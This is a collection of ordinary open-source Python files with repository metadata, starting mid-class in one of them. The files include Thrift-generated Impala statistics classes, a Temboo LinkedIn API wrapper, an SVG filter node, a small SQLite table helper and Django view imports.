return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TPlanNodeExecSummary(object):
"""
Attributes:
- node_id
- fragment_id
- label
- label_detail
- num_children
- estimated_stats
- exec_stats
- is_active
- is_broadcast
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'node_id', None, None, ), # 1
(2, TType.I32, 'fragment_id', None, None, ), # 2
(3, TType.STRING, 'label', None, None, ), # 3
(4, TType.STRING, 'label_detail', None, None, ), # 4
(5, TType.I32, 'num_children', None, None, ), # 5
(6, TType.STRUCT, 'estimated_stats', (TExecStats, TExecStats.thrift_spec), None, ), # 6
(7, TType.LIST, 'exec_stats', (TType.STRUCT,(TExecStats, TExecStats.thrift_spec)), None, ), # 7
(8, TType.LIST, 'is_active', (TType.BOOL,None), None, ), # 8
(9, TType.BOOL, 'is_broadcast', None, None, ), # 9
)
def __init__(self, node_id=None, fragment_id=None, label=None, label_detail=None, num_children=None, estimated_stats=None, exec_stats=None, is_active=None, is_broadcast=None,):
self.node_id = node_id
self.fragment_id = fragment_id
self.label = label
self.label_detail = label_detail
self.num_children = num_children
self.estimated_stats = estimated_stats
self.exec_stats = exec_stats
self.is_active = is_active
self.is_broadcast = is_broadcast
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.node_id = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.fragment_id = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.label = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.label_detail = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I32:
self.num_children = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRUCT:
self.estimated_stats = TExecStats()
self.estimated_stats.read(iprot)
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.LIST:
self.exec_stats = []
(_etype3, _size0) = iprot.readListBegin()
for _i4 in xrange(_size0):
_elem5 = TExecStats()
_elem5.read(iprot)
self.exec_stats.append(_elem5)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.LIST:
self.is_active = []
(_etype9, _size6) = iprot.readListBegin()
for _i10 in xrange(_size6):
_elem11 = iprot.readBool();
self.is_active.append(_elem11)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.BOOL:
self.is_broadcast = iprot.readBool();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TPlanNodeExecSummary')
if self.node_id is not None:
oprot.writeFieldBegin('node_id', TType.I32, 1)
oprot.writeI32(self.node_id)
oprot.writeFieldEnd()
if self.fragment_id is not None:
oprot.writeFieldBegin('fragment_id', TType.I32, 2)
oprot.writeI32(self.fragment_id)
oprot.writeFieldEnd()
if self.label is not None:
oprot.writeFieldBegin('label', TType.STRING, 3)
oprot.writeString(self.label)
oprot.writeFieldEnd()
if self.label_detail is not None:
oprot.writeFieldBegin('label_detail', TType.STRING, 4)
oprot.writeString(self.label_detail)
oprot.writeFieldEnd()
if self.num_children is not None:
oprot.writeFieldBegin('num_children', TType.I32, 5)
oprot.writeI32(self.num_children)
oprot.writeFieldEnd()
if self.estimated_stats is not None:
oprot.writeFieldBegin('estimated_stats', TType.STRUCT, 6)
self.estimated_stats.write(oprot)
oprot.writeFieldEnd()
if self.exec_stats is not None:
oprot.writeFieldBegin('exec_stats', TType.LIST, 7)
oprot.writeListBegin(TType.STRUCT, len(self.exec_stats))
for iter12 in self.exec_stats:
iter12.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.is_active is not None:
oprot.writeFieldBegin('is_active', TType.LIST, 8)
oprot.writeListBegin(TType.BOOL, len(self.is_active))
for iter13 in self.is_active:
oprot.writeBool(iter13)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.is_broadcast is not None:
oprot.writeFieldBegin('is_broadcast', TType.BOOL, 9)
oprot.writeBool(self.is_broadcast)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.node_id is None:
raise TProtocol.TProtocolException(message='Required field node_id is unset!')
if self.fragment_id is None:
raise TProtocol.TProtocolException(message='Required field fragment_id is unset!')
if self.label is None:
raise TProtocol.TProtocolException(message='Required field label is unset!')
if self.num_children is None:
raise TProtocol.TProtocolException(message='Required field num_children is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TExecSummary(object):
"""
Attributes:
- state
- status
- nodes
- exch_to_sender_map
- error_logs
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'state', None, None, ), # 1
(2, TType.STRUCT, 'status', (impala._thrift_gen.Status.ttypes.TStatus, impala._thrift_gen.Status.ttypes.TStatus.thrift_spec), None, ), # 2
(3, TType.LIST, 'nodes', (TType.STRUCT,(TPlanNodeExecSummary, TPlanNodeExecSummary.thrift_spec)), None, ), # 3
(4, TType.MAP, 'exch_to_sender_map', (TType.I32,None,TType.I32,None), None, ), # 4
(5, TType.LIST, 'error_logs', (TType.STRING,None), None, ), # 5
)
def __init__(self, state=None, status=None, nodes=None, exch_to_sender_map=None, error_logs=None,):
self.state = state
self.status = status
self.nodes = nodes
self.exch_to_sender_map = exch_to_sender_map
self.error_logs = error_logs
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.state = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.status = impala._thrift_gen.Status.ttypes.TStatus()
self.status.read(iprot)
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.LIST:
self.nodes = []
(_etype17, _size14) = iprot.readListBegin()
for _i18 in xrange(_size14):
_elem19 = TPlanNodeExecSummary()
_elem19.read(iprot)
self.nodes.append(_elem19)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.MAP:
self.exch_to_sender_map = {}
(_ktype21, _vtype22, _size20 ) = iprot.readMapBegin()
for _i24 in xrange(_size20):
_key25 = iprot.readI32();
_val26 = iprot.readI32();
self.exch_to_sender_map[_key25] = _val26
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.LIST:
self.error_logs = []
(_etype30, _size27) = iprot.readListBegin()
for _i31 in xrange(_size27):
_elem32 = iprot.readString();
self.error_logs.append(_elem32)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TExecSummary')
if self.state is not None:
oprot.writeFieldBegin('state', TType.I32, 1)
oprot.writeI32(self.state)
oprot.writeFieldEnd()
if self.status is not None:
oprot.writeFieldBegin('status', TType.STRUCT, 2)
self.status.write(oprot)
oprot.writeFieldEnd()
if self.nodes is not None:
oprot.writeFieldBegin('nodes', TType.LIST, 3)
oprot.writeListBegin(TType.STRUCT, len(self.nodes))
for iter33 in self.nodes:
iter33.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.exch_to_sender_map is not None:
oprot.writeFieldBegin('exch_to_sender_map', TType.MAP, 4)
oprot.writeMapBegin(TType.I32, TType.I32, len(self.exch_to_sender_map))
for kiter34,viter35 in self.exch_to_sender_map.items():
oprot.writeI32(kiter34)
oprot.writeI32(viter35)
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.error_logs is not None:
oprot.writeFieldBegin('error_logs', TType.LIST, 5)
oprot.writeListBegin(TType.STRING, len(self.error_logs))
for iter36 in self.error_logs:
oprot.writeString(iter36)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.state is None:
raise TProtocol.TProtocolException(message='Required field state is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
|
{
"content_hash": "e835a9c8769682e6634ecd8e43134fdd",
"timestamp": "",
"source": "github",
"line_count": 458,
"max_line_length": 188,
"avg_line_length": 33.146288209606986,
"alnum_prop": 0.6131348396021342,
"repo_name": "schaffino/impyla",
"id": "2a194b77aaa875944858870f23168e564481ebca",
"size": "15332",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "impala/_thrift_gen/ExecStats/ttypes.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "226216"
},
{
"name": "Shell",
"bytes": "6925"
},
{
"name": "Thrift",
"bytes": "87376"
}
],
"symlink_target": ""
}
|
__author__ = 'sandeep'
class Error(Exception):
""" Generic Error for client """
pass
class ValidationError(Error):
""" Error in case of invalid input """
pass
class HTTPError(Error):
""" Error Response from API """
pass
|
{
"content_hash": "f99037649e23ce6f291be21faf76fde2",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 42,
"avg_line_length": 15.625,
"alnum_prop": 0.616,
"repo_name": "Sandeep4/opinio",
"id": "53e6c2f5929d5f73d5ff515e0a3fec6b40f65ca3",
"size": "250",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "opinio/errors.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "4947"
}
],
"symlink_target": ""
}
|
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class GetHistoricalUpdates(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the GetHistoricalUpdates Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(GetHistoricalUpdates, self).__init__(temboo_session, '/Library/LinkedIn/Companies/GetHistoricalUpdates')
def new_input_set(self):
return GetHistoricalUpdatesInputSet()
def _make_result_set(self, result, path):
return GetHistoricalUpdatesResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return GetHistoricalUpdatesChoreographyExecution(session, exec_id, path)
class GetHistoricalUpdatesInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the GetHistoricalUpdates
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_APIKey(self, value):
"""
Set the value of the APIKey input for this Choreo. ((required, string) The API Key provided by LinkedIn (AKA the Client ID).)
"""
super(GetHistoricalUpdatesInputSet, self)._set_input('APIKey', value)
def set_AccessTokenSecret(self, value):
"""
Set the value of the AccessTokenSecret input for this Choreo. ((required, string) The Access Token Secret retrieved during the OAuth process (AKA the OAuth User Secret).)
"""
super(GetHistoricalUpdatesInputSet, self)._set_input('AccessTokenSecret', value)
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The Access Token retrieved during the OAuth process (AKA the OAuth User Token).)
"""
super(GetHistoricalUpdatesInputSet, self)._set_input('AccessToken', value)
def set_CompanyID(self, value):
"""
Set the value of the CompanyID input for this Choreo. ((required, integer) A LinkedIn assigned ID associated with the company.)
"""
super(GetHistoricalUpdatesInputSet, self)._set_input('CompanyID', value)
def set_EndTimestamp(self, value):
"""
Set the value of the EndTimestamp input for this Choreo. ((optional, date) The starting timestamp of when the stats search should begin (milliseconds since epoch). The current time will be used if a timestamp is not provided.)
"""
super(GetHistoricalUpdatesInputSet, self)._set_input('EndTimestamp', value)
def set_ResponseFormat(self, value):
"""
Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format that the response should be in. Valid values are: xml (the default) and json.)
"""
super(GetHistoricalUpdatesInputSet, self)._set_input('ResponseFormat', value)
def set_SecretKey(self, value):
"""
Set the value of the SecretKey input for this Choreo. ((required, string) The Secret Key provided by LinkedIn (AKA the Client Secret).)
"""
super(GetHistoricalUpdatesInputSet, self)._set_input('SecretKey', value)
def set_StartTimestamp(self, value):
"""
Set the value of the StartTimestamp input for this Choreo. ((required, date) The starting timestamp of when the stats search should begin (milliseconds since epoch). The current time will be used if a timestamp is not provided.)
"""
super(GetHistoricalUpdatesInputSet, self)._set_input('StartTimestamp', value)
def set_TimeGranularity(self, value):
"""
Set the value of the TimeGranularity input for this Choreo. ((required, string) Granularity of statistics. Valid values are: day, month.)
"""
super(GetHistoricalUpdatesInputSet, self)._set_input('TimeGranularity', value)
def set_UpdateKey(self, value):
"""
Set the value of the UpdateKey input for this Choreo. ((optional, string) Optionally provide an update key value to return statistics for a specific company update.)
"""
super(GetHistoricalUpdatesInputSet, self)._set_input('UpdateKey', value)
class GetHistoricalUpdatesResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the GetHistoricalUpdates Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. (The response from LinkedIn.)
"""
return self._output.get('Response', None)
class GetHistoricalUpdatesChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return GetHistoricalUpdatesResultSet(response, path)
|
{
"content_hash": "8e7af16d78f30f03d408e13054bc5048",
"timestamp": "",
"source": "github",
"line_count": 101,
"max_line_length": 236,
"avg_line_length": 50.257425742574256,
"alnum_prop": 0.7023246650906225,
"repo_name": "lupyuen/RaspberryPiImage",
"id": "80800c237ae0968e4c6d6c97b694129ce5248b32",
"size": "5984",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "home/pi/GrovePi/Software/Python/others/temboo/Library/LinkedIn/Companies/GetHistoricalUpdates.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Arduino",
"bytes": "82308"
},
{
"name": "C",
"bytes": "3197439"
},
{
"name": "C#",
"bytes": "33056"
},
{
"name": "C++",
"bytes": "1020255"
},
{
"name": "CSS",
"bytes": "208338"
},
{
"name": "CoffeeScript",
"bytes": "87200"
},
{
"name": "Eagle",
"bytes": "1632170"
},
{
"name": "Go",
"bytes": "3646"
},
{
"name": "Groff",
"bytes": "286691"
},
{
"name": "HTML",
"bytes": "41527"
},
{
"name": "JavaScript",
"bytes": "403603"
},
{
"name": "Makefile",
"bytes": "33808"
},
{
"name": "Objective-C",
"bytes": "69457"
},
{
"name": "Perl",
"bytes": "96047"
},
{
"name": "Processing",
"bytes": "1304"
},
{
"name": "Python",
"bytes": "13358098"
},
{
"name": "Shell",
"bytes": "68795"
},
{
"name": "TeX",
"bytes": "4317"
}
],
"symlink_target": ""
}
|
from RGT.XML.SVG.Filters.baseFilterNode import BaseFilterNode
from types import StringType
from RGT.XML.SVG.basicSvgNode import BasicSvgNode
class FeSpecularLightingNode(BaseFilterNode):
svgNodeType = BasicSvgNode.SVG_FE_SPECULAR_LIGHTING_NODE
ATTRIBUTE_IN = 'in'
ATTRIBUTE_SURFACE_SCALE = 'surfaceScale'
ATTRIBUTE_SPECULAR_CONSTANT = 'specularConstant'
ATTRIBUTE_SPECULAR_EXPONENT = 'specularExponent'
ATTRIBUTE_KERNEL_UNIT_LENGTH = 'kernelUnitLength'
def __init__(self, ownerDoc):
BaseFilterNode.__init__(self, ownerDoc, 'feSpecularLighting')
self._allowedSvgChildNodes.update(self.SVG_GROUP_DESCRIPTIVE_ELEMENTS, self.SVG_GROUP_LIGHT_SOURCE_ELEMENTS)
def setIn(self, data):
if data is not None:
if type(data) is not StringType:
data = str(data)
self._setNodeAttribute(self.ATTRIBUTE_IN, data)
def setSurfaceScale(self, data):
if data is not None:
if type(data) is not StringType:
data = str(data)
self._setNodeAttribute(self.ATTRIBUTE_SURFACE_SCALE, data)
def setSpecularConstant(self, data):
if data is not None:
if type(data) is not StringType:
data = str(data)
self._setNodeAttribute(self.ATTRIBUTE_SPECULAR_CONSTANT, data)
def setSpecularExponent(self, data):
if data is not None:
if type(data) is not StringType:
data = str(data)
self._setNodeAttribute(self.ATTRIBUTE_SPECULAR_EXPONENT, data)
def setKernelUnitLength(self, data):
if data is not None:
if type(data) is not StringType:
data = str(data)
self._setNodeAttribute(self.ATTRIBUTE_KERNEL_UNIT_LENGTH, data)
def getIn(self):
node = self._getNodeAttribute(self.ATTRIBUTE_IN)
if node is not None:
return node.nodeValue
return None
def getSurfaceScale(self):
node = self._getNodeAttribute(self.ATTRIBUTE_SURFACE_SCALE)
if node is not None:
return node.nodeValue
return None
def getSpecularConstant(self):
node = self._getNodeAttribute(self.ATTRIBUTE_SPECULAR_CONSTANT)
if node is not None:
return node.nodeValue
return None
def getSpecularExponent(self):
node = self._getNodeAttribute(self.ATTRIBUTE_SPECULAR_EXPONENT)
if node is not None:
return node.nodeValue
return None
def getKernelUnitLength(self):
node = self._getNodeAttribute(self.ATTRIBUTE_KERNEL_UNIT_LENGTH)
if node is not None:
return node.nodeValue
return None
|
{
"content_hash": "29f7452b756c7e186b4720377bc842eb",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 116,
"avg_line_length": 35.666666666666664,
"alnum_prop": 0.6297627606038821,
"repo_name": "danrg/RGT-tool",
"id": "3e2e2e1e1af3a63a322fe232cab1a90d327cb6e4",
"size": "2782",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/RGT/XML/SVG/Filters/feSpecularLightingNode.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "83200"
},
{
"name": "HTML",
"bytes": "93970"
},
{
"name": "JavaScript",
"bytes": "111380"
},
{
"name": "Python",
"bytes": "788710"
},
{
"name": "SQLPL",
"bytes": "722"
}
],
"symlink_target": ""
}
|
import json
class SdsNamespace(object):
"""description of class"""
@property
def Id(self):
return self.__id
@Id.setter
def Id(self, id):
self.__id = id
def toString(self):
return json.dumps(self.toDictionary())
def toDictionary(self):
# required properties
dictionary = { 'Id' : self.Id }
return dictionary
@staticmethod
def fromString(content):
dictionary = json.loads(content)
return SdsNamespace.fromDictionary(dictionary)
@staticmethod
def fromDictionary(content):
namespace = SdsNamespace()
if len(content) == 0:
return namespace
if "Id" in content:
namespace.Id = content["Id"]
return namespace
|
{
"content_hash": "e18ce1210e4884452ce1b540079b1394",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 55,
"avg_line_length": 21.324324324324323,
"alnum_prop": 0.5792141951837769,
"repo_name": "osisoft/Qi-Samples",
"id": "af3e08e7137aff5502b58f30ca47b5037f520cad",
"size": "1384",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ocs_samples/library_samples/Python3/ocs_sample_library_preview/SDS/SdsNamespace.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C#",
"bytes": "199449"
},
{
"name": "CSS",
"bytes": "1450"
},
{
"name": "HTML",
"bytes": "14949"
},
{
"name": "Java",
"bytes": "106564"
},
{
"name": "JavaScript",
"bytes": "66956"
},
{
"name": "Python",
"bytes": "265126"
},
{
"name": "TypeScript",
"bytes": "112972"
}
],
"symlink_target": ""
}
|
from numpy import arange
from numpy.testing import TestCase, assert_
from scipy.weave import standard_array_spec
def remove_whitespace(in_str):
out = in_str.replace(" ","")
out = out.replace("\t","")
out = out.replace("\n","")
return out
class TestArrayConverter(TestCase):
def test_type_match_string(self):
s = standard_array_spec.array_converter()
assert_( not s.type_match('string') )
def test_type_match_int(self):
s = standard_array_spec.array_converter()
assert_(not s.type_match(5))
def test_type_match_array(self):
s = standard_array_spec.array_converter()
assert_(s.type_match(arange(4)))
if __name__ == "__main__":
import nose
nose.run(argv=['', __file__])
|
{
"content_hash": "e111e2a80a704eece6f35c250af228f6",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 49,
"avg_line_length": 25.333333333333332,
"alnum_prop": 0.6236842105263158,
"repo_name": "lesserwhirls/scipy-cwt",
"id": "b021dbc5f7fa9e51b7301d547583cc519062b046",
"size": "760",
"binary": false,
"copies": "9",
"ref": "refs/heads/cwt",
"path": "scipy/weave/tests/test_standard_array_spec.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "8532454"
},
{
"name": "C++",
"bytes": "6602032"
},
{
"name": "FORTRAN",
"bytes": "5895476"
},
{
"name": "Objective-C",
"bytes": "4346"
},
{
"name": "Python",
"bytes": "4776663"
},
{
"name": "Shell",
"bytes": "1742"
}
],
"symlink_target": ""
}
|
''' This class is only a model, to use it is necessary to extend it, and add
the table proprieties such name, columns, primary keys, etc...
The _columns atribute have to be initiated in the __init__(self, connection)
method, and when overwrite this method, is necessary execute the parent init
first:
parent().__init__(connection)
'''
import datetime
import copy
class DbTable:
''' Basic class ORM like to manage the table objects and data '''
_table_name = '' # Table name
_primary = [] # primary key name
_children_tables = {} # tablename
_foreigh_keys = {} # {keyname : tablename.collumnname}
_conn = None
def __init__(self, connection):
''' the table object have to receive a conncetion object to be
initiated '''
self._columns = {} # {cname: {value:"", type: "", default:"" }}
# if default = 'AUTO' the column will be autoincrement
if connection is connection:
self._conn = connection
self._queued_to_save = False # if true, not permit to change values
def set_value(self, cname, cvalue):
''' table.set_value(field_name, value) - add a value to field '''
if not self._queued_to_save:
if cname in self._columns.keys():
if (isinstance(cvalue, self._columns[cname]['type']) or
(isinstance(cvalue, int) and
self._columns[cname]['type'] == bool)):
self._columns[cname]['value'] = cvalue
else:
raise TypeError('Incorrect value type.')
else:
raise Exception('The column ' + cname + ' is not found.')
else:
raise Exception(
'Object queued to save, the values are readonly until save.')
def get_value(self, cname):
''' table.get_value(field_name) - return the field value '''
if cname in self._columns:
return self._columns[cname]['value']
return None
def get_values(self, conj_cname):
''' '''
values = {}
if cname in conj_cname:
value = self.get_value(cname)
if value:
values[cname] = value
return values
def find(self):
''' table.find()
Does a search in the table and return the first row that match with
the values in the object values set with
table.set_value('cname', value) '''
select_query = {}
for key, value in self._columns.items():
if str(value['default']).upper() not in ['AUTO', 'AUTOINCREMENT'
] or value['value']:
select_query[key] = value['value']
cursor = self._select_query(select_query)
result = cursor.fetchone()
if result:
headers = {
idx: desc[0]
for idx, desc in enumerate(cursor.description)
}
for index, value in enumerate(result):
self.set_value(headers[index], value)
return True
return False
def list(self, query={}):
''' table.find({'field_name1':value1, 'field_name2': value2})
Does a search in the table for the values and populate the return a
list of table objects '''
cursor = self._select_query(query)
object_list = []
headers = {idx: desc[0] for idx, desc in enumerate(cursor.description)}
for i, row in enumerate(cursor.fetchall()):
object_list.append(self.__class__(self._conn))
for index, value in enumerate(row):
object_list[i].set_value(headers[index], copy.copy(value))
return object_list
def save(self):
''' Save the values to table '''
if not self._queued_to_save: # if not queued, lets queue!
self.queue_to_save()
self._conn.commit()
self._queued_to_save = False # commited
self.find()
return self.get_value(self._primary[0])
def queue_to_save(self):
'''Insert os update a table tuple value '''
columns = []
values = []
select_query = {}
for key, value in self._columns.items():
if str(value['default']).upper() not in ['AUTO', 'AUTOINCREMENT'
] or value['value']:
columns.append(key)
values.append(value['value'])
select_query[key] = value['value']
placeholders = ','.join(['?' for i in range(len(values))])
query = 'INSERT OR REPLACE INTO {table} ({cols}) \
VALUES({placeholder})'.format(
table=self._table_name,
cols=','.join(columns),
placeholder=placeholders)
self._queued_to_save = True
return self._conn.execute(query, values).lastrowid
def check_table(self):
''' Check if table exist, if not, create it '''
if not self._table_exists():
self._create_table()
def column_type(self, column_name):
'''get the type of a collun'''
if column_name in self._columns.keys():
return self._columns[column_name]['type']
return None
def get_last_rowid(self):
''' Get the last ROWID of the primary key of the table'''
query = 'SELECT seq FROM sqlite_sequence WHERE name=?'
return self._conn.execute(query, [self._table_name]).fetchone()[0]
def _table_exists(self):
''' Check if this table exist in database '''
query = 'SELECT name FROM sqlite_master WHERE type="table" AND name=?'
return self._conn.execute(query, [self._table_name]).fetchone()\
is not None
def _create_table(self):
''' Create this table if not exists '''
columns_def = ''
foreigh = ''
for key, value in self._columns.items(): # COLDEF
# columname datatype primary key (columns)
ctype = self._type_convert(value['type'])
constraint = ''
if key in self._primary:
constraint += ' primary key'
if value['default'] in ['AUTO', 'AUTOINCREMENT']:
constraint += ' AUTOINCREMENT'
else:
constraint += ' DEFAULT {v1}'.format(v1=(
str(value['default']) if value['type'] is not str
else '"{v}"'.format(v=value['default'])
))
columns_def += key + ' ' + ctype + constraint + ', '
for key, value in self._foreigh_keys.items():
# FOREIGN KEY(trackartist) REFERENCES artist(artistid)
table, column = value.split('.', 2)
foreigh += ', FOREIGN KEY({_key}) \
REFERENCES {_table}({_column}), '.format(
_key=key,
_table=table,
_column=column)
query = 'CREATE TABLE \
IF NOT EXISTS {table} ({coldef} {foreigh}) '.format(
table=self._table_name,
coldef=columns_def[:-2],
foreigh=foreigh[:-2])
cursor = self._conn.cursor()
cursor.execute(query)
self._conn.commit()
def get_columns_name(self):
''' return columns names '''
return self._columns.keys()
def _type_convert(self, ctype):
''' Convert python type to sqlite type '''
ctypes = {
'INTEGER': [int],
'BOOLEAN': [bool],
'REAL': [float],
'TEXT': [str, datetime],
'BLOB': [bytes]
}
for sqlite_type, python_types in ctypes.items():
if ctype in python_types:
return sqlite_type
return 'BLOB'
def _select_query(self, query):
''' assemble the select query '''
where_stmt = []
values = []
for key, value in query.items():
if key in self._columns.keys():
where_stmt.append(key + ' = ? ')
values.append(value)
else:
raise Exception('The column ' + cname + ' is not found.')
nquery = 'SELECT {cols} FROM {table} {where}'.format(
cols=", ".join(self._columns.keys()),
table=self._table_name,
where='WHERE ' + ' AND '.join(where_stmt) if len(
where_stmt) else '')
return self._conn.execute(nquery, values)
|
{
"content_hash": "8c071a152dd9af2f1fbab94636345706",
"timestamp": "",
"source": "github",
"line_count": 219,
"max_line_length": 79,
"avg_line_length": 38.57990867579909,
"alnum_prop": 0.5311871227364185,
"repo_name": "welblade/pyrom",
"id": "e7cadbd008dede08308458fe7ddc52786fbf7f6b",
"size": "8498",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "core/dbtable.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "54718"
}
],
"symlink_target": ""
}
|
"""
Copyright 2012 GroupDocs.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class UpdateStorageProviderResult:
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually."""
def __init__(self):
self.swaggerTypes = {
}
|
{
"content_hash": "f89219d8ae3ab4a1f49be0827985a07a",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 77,
"avg_line_length": 28.366666666666667,
"alnum_prop": 0.6839012925969448,
"repo_name": "liosha2007/temporary-groupdocs-python-sdk",
"id": "c85777537ef8621a5c87edbb99cb3278bde8e1d4",
"size": "873",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "groupdocs/models/UpdateStorageProviderResult.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1070081"
}
],
"symlink_target": ""
}
|
''' The internationalization handler '''
import gettext
TRANS = gettext.translation('tmppackages', 'locale', fallback=True)
_ = TRANS.ugettext
|
{
"content_hash": "3154ec31ea9ba84f1e3b60ab5879e825",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 67,
"avg_line_length": 24.166666666666668,
"alnum_prop": 0.7448275862068966,
"repo_name": "mweb/python_template_project",
"id": "292e249b3f65347cc20e4d197a16e9869d1043d7",
"size": "1743",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tmppackages/i18n.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "71455"
},
{
"name": "Shell",
"bytes": "517"
}
],
"symlink_target": ""
}
|
from django.http import HttpResponseRedirect, Http404, HttpResponse
from django.template import RequestContext, loader
from django.shortcuts import get_object_or_404, render_to_response
from django.contrib.auth.decorators import login_required
from django.views.generic.list_detail import object_list
from django.conf import settings
import sys
import threading # theme is passed thru thread local
from gitology.config import settings as gsettings
from gitology import utils
from gitology.document import Document
from gitology.d import forms
from gitology.d.utils import select_theme
gsettings.threadlocal = threading.local()
# TODO find out exactly why its considered a hacky solution
# }}}
# blog related views # {{{
# show_blog # {{{
